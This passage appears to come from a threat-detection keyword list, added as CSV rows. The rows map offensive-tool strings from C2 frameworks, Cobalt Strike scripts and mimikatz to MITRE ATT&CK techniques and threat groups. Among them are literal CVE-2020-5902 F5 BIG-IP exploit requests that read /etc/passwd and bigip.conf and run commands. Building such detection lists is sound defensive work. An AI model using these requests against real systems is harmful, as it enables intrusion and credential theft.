+"*generate_powershell_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*generate_powershell_shellcode*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 
- T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*generate_python_exe*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - 
HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*generate_python_shellcode*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*generate_raw_payload*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - 
T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z"
+"*generate_spoofed_args_exe*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
+"*generate_stageless*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - 
T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z" +"*generate_unmanaged_exe operation1 *.exe","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_x64_shellcode*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*generate_x86_shellcode*","offensive_tool_keyword","octopus","Octopus is an open source. 
pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*GenerateDllBase64Hta*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*GenerateExeBase64*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" +"*GenerateForcedBrowseWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*generateInjectBinFile*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Generate-Macro.ps1*","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","7","665","218","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z" +"*GenerateParameterWordlist.py*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*GenerateReverseTcpDrone*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*generate-rotating-beacon.*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z" +"*GeneratesShellcodeFromPEorDll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*GenericC2Relay.cs*","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - 
T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","198","47","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" +"*Genetic-Malware/Ebowla*","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","10","8","710","179","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z" +"*genHTA*","offensive_tool_keyword","genHTA","Generates anti-sandbox analysis HTA files without payloads. anti-sandbox analysis HTA File Generator","T1564 - T1059 - T1027 - T1055","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/mdsecactivebreach/genHTA","1","0","N/A","N/A","1","15","3","2017-03-16T21:49:59Z","2017-06-12T10:58:35Z" +"*genmkvpwd *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*gentilkiwi (Benjamin DELPY)*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*gentilkiwi*","offensive_tool_keyword","mimikatz","author of mimikatz and multiple other windows exploitation tools","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*GeorgePatsias/ScareCrow*","offensive_tool_keyword","cobaltstrike","Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - 
Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GeorgePatsias/ScareCrow-CobaltStrike","1","1","N/A","10","10","438","68","2022-07-15T09:39:18Z","2021-06-24T10:04:01Z" +"*georgesotiriadis/Chimera*","offensive_tool_keyword","Chimera","Automated DLL Sideloading Tool With EDR Evasion Capabilities","T1574 - T1574.001 - T1218 - T1218.002 - T1070 - T1070.004 - T1036 - T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/georgesotiriadis/Chimera","1","1","N/A","9","3","282","41","2023-09-21T14:01:23Z","2023-05-15T13:02:54Z" +"*geowordlists --postal-code 75001 --kilometers 25 --output-file /tmp/around_paris.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*GET */login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.conf*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. 
/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET */tmui/login.jsp/.. /tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/yasserjanah/CVE-2020-5902","1","0","N/A","N/A","1","37","13","2023-05-22T23:32:39Z","2020-07-06T01:12:23Z" +"*GET *https://*/tmui/login.jsp/.. 
/tmui/locallb/workspace/tmshCmd.jsp?command=whoami*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://gist.github.com/cihanmehmet/07d2f9dac55f278839b054b8eb7d4cc5","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*get_beacon(*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*get_BeaconHealthCheck_settings*","offensive_tool_keyword","cobaltstrike","This aggressor script uses a beacon's note field to indicate the health status of a beacon.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/beacon_health_check","1","1","N/A","10","10","138","25","2021-09-29T20:20:52Z","2021-07-08T13:28:11Z" +"*get_c2_messages*","offensive_tool_keyword","poshc2","keywords from 
poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_c2server_all*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_cmd_from_task_id*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*get_dns_dnsidle*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*get_dns_sleep*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 
